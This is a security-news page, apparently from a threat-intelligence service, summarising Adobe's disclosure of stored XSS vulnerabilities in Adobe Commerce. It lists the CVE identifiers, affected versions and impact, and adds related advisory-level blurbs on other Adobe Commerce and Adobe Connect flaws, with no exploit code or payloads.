Multiple Stored XSS Vulnerabilities in Adobe Commerce
Adobe Commerce disclosed multiple stored cross-site scripting (XSS) vulnerabilities affecting versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and earlier. The issues tracked as CVE-2026-21284, CVE-2026-21290, CVE-2026-21311, and CVE-2026-21361 allow malicious JavaScript to be injected into vulnerable form fields and later executed in a victim’s browser when the affected page is viewed. Adobe indicates the impact can include session takeover and high confidentiality and integrity risk.
The vulnerabilities differ primarily in the privilege level required to plant the payload, with most requiring a high-privileged attacker and at least one (CVE-2026-21290) being exploitable by a low-privileged attacker. In all cases, exploitation requires user interaction, as a victim must browse to the page containing the injected content. A separate write-up about a chained exploit involving postMessage misconfiguration, prompt injection, and sandbox escape on an AI assistant platform does not describe the same Adobe Commerce disclosure and should be excluded.
Timeline
Mar 11, 2026
Adobe discloses multiple Adobe Commerce stored XSS vulnerabilities
Adobe Commerce vulnerabilities CVE-2026-21284, CVE-2026-21290, CVE-2026-21311, and CVE-2026-21361 were published as stored cross-site scripting flaws affecting multiple versions up to specific patch levels, including 2.4.9-alpha3 in several cases. The issues could allow attackers to inject malicious scripts into form fields and potentially hijack user sessions when victims view affected pages.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Sources
Related Stories
Critical Adobe Commerce Session Hijack Flaw Added to KEV After Active Exploitation
Adobe released an out-of-band fix for **CVE-2025-54236**, a critical improper input validation flaw in **Adobe Commerce**, **Adobe Commerce B2B**, and **Magento Open Source** that allows unauthenticated attackers to take over user sessions through vulnerable session-handling and Web API components. The bug, dubbed **"SessionReaper"** by Sansec, carries a reported **CVSS 9.1** rating and can lead to account hijacking, exposure of customer data, fraudulent orders, administrative access, and in some scenarios potentially remote code execution. Affected releases span multiple 2.4.x branches, including versions from **2.4.4 through 2.4.7** and other listed builds and earlier releases. Security guidance escalated after reports said the flaw was being actively exploited in the wild and added to **CISA's Known Exploited Vulnerabilities** catalog. Adobe published remediation details in **APSB25-88** and shipped patched versions, while defenders were urged to apply the vendor fix immediately, verify patch status, review logs for anomalous session activity, tighten administrative access, and increase **WAF**, API, and **SIEM** monitoring. Advisories also warned that leaked hotfix details and unofficial fixes could accelerate attacker weaponization or create additional risk.
1 weeks ago
Adobe Connect Patches Reflected XSS Flaws Allowing Script Execution via Crafted URLs
Adobe disclosed two high-severity reflected cross-site scripting vulnerabilities in **Adobe Connect**—`CVE-2026-27245` and `CVE-2026-27243`—affecting versions **2025.3, 12.10, and earlier**. The flaws allow an attacker to trigger execution of malicious JavaScript in a victim’s browser if the victim is persuaded to open a specially crafted URL pointing to a vulnerable page. Both issues are classified as **CWE-79** and carry the same **CVSS v3.1** vector, `AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`, indicating network-reachable exploitation with no privileges required but user interaction needed. Adobe referenced the vulnerabilities in security bulletin **APSB26-37**, and the changed scope plus high confidentiality and integrity impact suggest successful exploitation could let attackers act within the victim’s browser session and compromise exposed application data or actions.
2 weeks ago
Adobe Connect Flaws Expose Users to XSS and Potential Code Execution
Adobe disclosed two high-severity vulnerabilities in **Adobe Connect** affecting versions **2025.3, 12.10, and earlier**, and directed customers to advisory **`APSB26-37`** for remediation. One issue, **`CVE-2026-27246`**, is a DOM-based cross-site scripting flaw classified as **`CWE-79`** that can let an attacker manipulate the browser DOM and run malicious JavaScript in a victim’s session after luring the user to a crafted webpage. The vulnerability carries a CVSS v3.1 vector of **`AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`**, indicating network reachability, low attack complexity, no privileges required, and high confidentiality and integrity impact. Adobe also disclosed **`CVE-2026-34615`**, a **`CWE-502`** deserialization of untrusted data vulnerability in the same product versions that can lead to arbitrary code execution in the context of the current user. Adobe said exploitation of the deserialization flaw does not require user interaction, making it the more serious of the two issues, while both bugs were published through Adobe’s PSIRT process and affect the same supported and earlier Adobe Connect releases. Organizations using Adobe Connect should prioritize patching exposed deployments and reviewing the vendor advisory for fixed versions and mitigation guidance.
2 weeks ago